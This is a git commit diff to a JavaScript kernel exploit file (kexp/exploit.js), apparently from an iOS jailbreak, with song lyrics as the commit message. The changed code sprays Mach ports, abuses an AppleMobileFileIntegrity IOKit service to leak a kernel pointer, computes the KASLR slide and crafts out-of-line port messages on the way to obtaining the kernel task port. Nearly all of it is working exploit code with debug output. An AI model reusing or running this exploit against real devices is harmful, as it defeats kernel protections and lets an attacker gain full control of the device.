From b040db45dfc9ef9a902e48bc2718a94cd099f505 Mon Sep 17 00:00:00 2001 From: spv420 Date: Tue, 31 May 2022 19:51:14 -0400 Subject: I live in a constant state of fear and misery Do you miss me anymore? And I don't even notice When it hurts anymore Anymore Anymore Anymore --- src/js/kexp/exploit.js | 92 ++++++++++++++++++-------------------------------- 1 file changed, 32 insertions(+), 60 deletions(-) (limited to 'src/js/kexp') diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js index 544a876..c667dd2 100755 --- a/src/js/kexp/exploit.js +++ b/src/js/kexp/exploit.js @@ -105,24 +105,28 @@ function copyinPort(kport, cnt) { var data = malloc(4); var master = malloc(4); fakeportData = malloc(4); + var host_self = mach_host_self(); host_get_io_master(mach_host_self(), master); ret = spray_data(NULL, 0, 5, data); printf("sprayed, still here\n"); printf("spray_data=%d (%s)\n", ret, mach_error_string(ret)); printf("sprayed, still here\n"); +// printf("%x %x\n", master, read_u32(master)); service = IOServiceGetMatchingService(read_u32(master), IOServiceMatching("AppleMobileFileIntegrity")); printf("service=%x\n", service); var tst = sptr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); + printf("%x\n", tst); var kpbuf = tst + 4; for (var i = 0; i < cnt; i++) { write_buf(kpbuf + (i * kport_size), read_buf(kport + (i * kport_size), kport_size), kport_size); } var err = malloc(4); - var xml = sptr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1768515945"); - ret = io_service_open_extended(service, self, 0, 0, 1, xml, strlen(xml) + 1, err, client); + var xmls = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1768515945"; + var xml = sptr(xmls); + ret = io_service_open_extended(service, self, 0, 0, 1, xml, xmls.length + 1, err, client); printf("io_service_open_extended=%d (%s)\n", ret, mach_error_string(ret)); if (ret == KERN_SUCCESS) { ret = read_u32(err); @@ -132,7 +136,6 @@ function copyinPort(kport, cnt) { var found = false; var o = IOIteratorNext(read_u32(it)); - printf("%x\n", o); while (o != MACH_PORT_NULL && !found) { var buf = malloc(16 * 4); @@ -141,13 +144,8 @@ function copyinPort(kport, cnt) { ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size); printf("%d %s\n", ret, mach_error_string(ret)); if (ret == KERN_SUCCESS) { - printf("yolo\n"); -// mach_port_deallocate(self, read_u32(data)); -// write_u32(data, MACH_PORT_NULL); spray_data(tst, strlen(tst) + 1, 10, fakeportData); - printf("still still alive?\n"); kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0; - printf("still alive? %x\n", 420); printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16)); found = true; return ((read_u32(buf + (4 << 2)) - 0x78)) >>> 0; @@ -202,7 +200,10 @@ function spray_ports(number_port_descs) { mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp); mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND); - send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs); + var ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs); + +// printf("%d (%s)\n", ret_, mach_error_string(ret_)); + var ret = read_u32(mp); free(mp); return ret; @@ -236,75 +237,46 @@ function send_ports(target, payload, num, number_port_descs) { write_u32(init_port_set + (i << 2), payload); } - var buf = malloc(0x1c + (number_port_descs * 0xc * 8)); + // var buf = malloc(0x1c + (number_port_descs * 0xc * 8)); - write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs); +// write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs); - var new_buf = new Uint32Array(3); -// var tmp = u32_to_u8x4(init_port_set); - new_buf[0] = (init_port_set); - new_buf[1] = (num); - new_buf[2] = ((19 << 24) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 16)); - -// new_buf_.push(tmp[0]); -// new_buf_.push(tmp[1]); -// new_buf_.push(tmp[2]); -// new_buf_.push(tmp[3]); -// tmp = u32_to_u8x4(num); -// new_buf_.push(tmp[0]); -// new_buf_.push(tmp[1]); -// new_buf_.push(tmp[2]); -// new_buf_.push(tmp[3]); -// new_buf_.push(0); -// new_buf_.push(0); -// new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR); -// new_buf_.push(19); - -// printf("%x 0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,\n", new_buf_.length, new_buf_[zz]]); - -// var new_buf = fast_array_mul(new_buf_, number_port_descs); +// var buf = new Uint32Array((0x1c + (3 * number_port_descs)) / 4); - for (var i = 0; i < number_port_descs; i++) { - write_u32_buf(buf + req_init_port_set + (i * 0xc), new_buf, new_buf.length * 4); - } + large_buf[req_msgh_body_msgh_descriptor_count / 4] = number_port_descs; - /* - for (var i = 0; i < number_port_descs; i++) { - write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set); - write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num); - write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0); - write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19); - write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR); - }*/ + var tmp = ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)); - write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE) - write_u32(buf + req_head_msgh_request_port, target); - write_u32(buf + req_head_msgh_reply_port, 0); - write_u32(buf + req_head_msgh_id, 1337); + for (var i = 0; i < number_port_descs; i++) { + var tmp2 = (i * 3) + (req_init_port_set >>> 2); + large_buf[tmp2 + 0] = (init_port_set); + large_buf[tmp2 + 1] = (num); + large_buf[tmp2 + 2] = tmp; + } - var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL); + large_buf[req_head_msgh_bits >>> 2] = 0x80001513; // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE) + large_buf[req_head_msgh_request_port >>> 2] = target; + large_buf[req_head_msgh_reply_port >>> 2] = 0; + large_buf[req_head_msgh_id >>> 2] = 1337; - free(buf); +// printf("%s\n", prim_hexdump(read_buf(large_buf_ptr, 0x100))); + + var ret = mach_msg(large_buf_ptr, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL); return ret; } function release_port_ptrs(port) { - printf("alive\n"); var req = malloc(0x1c + (5 * 0xc) + 0x8); for (var i = 0; i < (0x1c + (5 * 0xc) + 0x8); i += 4) { write_u32(req + i, 0x0); } printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0")); - printf("alive\n"); var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); - printf("alive\n"); - // if (ret != KERN_SUCCESS) { -// printf("mach_recv %d %s\n", ret, mach_error_string(ret)); - printf("alive\n"); - // } + if (ret != KERN_SUCCESS) { + printf("mach_recv %d %s\n", ret, mach_error_string(ret)); + } free(req); - printf("alive\n"); } function get_kernel_task() { @@ -335,7 +307,7 @@ function get_kernel_task() { var big_buf = malloc(MIG_MAX); var small_buf = malloc(MIG_MAX); - + var big_size = malloc(4); var small_size = malloc(4); -- cgit v1.2.3